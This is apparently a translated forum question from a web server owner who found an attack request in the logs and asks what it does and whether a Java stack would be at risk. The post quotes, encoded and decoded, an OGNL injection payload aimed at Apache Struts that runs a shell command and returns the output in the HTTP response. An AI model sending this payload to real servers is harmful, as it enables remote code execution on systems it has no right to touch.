这个黑客试图用这个Java代码做什么？

在我的web服务器的服务器日志中，我注意到一名黑客正在尝试以下操作：

https://[domain name]/index.action?action:${%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]{'sh','-c','id'})).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27),%23matt.getwriter().println(%23e),%23matt.getwriter().flush(),%23matt.getwriter().close()}

哪个URL解码为：

https://[domain name]/index.action?action:${#a=(new java.lang.processbuilder(new java.lang.string[]{'sh','-c','id'})).start(),#b=#a.getinputstream(),#c=new java.io.inputstreamreader(#b),#d=new java.io.bufferedreader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),#matt.getwriter().println(#e),#matt.getwriter().flush(),#matt.getwriter().close()}

我的服务器不使用Java，但我试图了解这个黑客在这里试图做什么，以及为什么这可能是一个漏洞。毕竟，我不仅仅是一名开发人员，还需要知道如何保护服务器，包括不是由我设置的服务器

代码似乎启动了一个新进程，然后尝试从输入流中读取数据。我假设这是当前web会话的输入流

因为此攻击也会通过/login进行尝试。动作和其他各种URL以及不同的Java代码，我认为这是潜在的危险。但我无法解释为什么这很危险

当黑客试图查看它是否在运行WordPress、Magenta或其他已知系统时，特定域现在正受到攻击，并且还尝试了几种不同的攻击

但重要的是：该领域目前正在开发中，所有者仍然必须决定将使用哪些开发工具。选择是在Java和ASP-NET之间进行的，因此如果他选择Java，这种攻击是否危险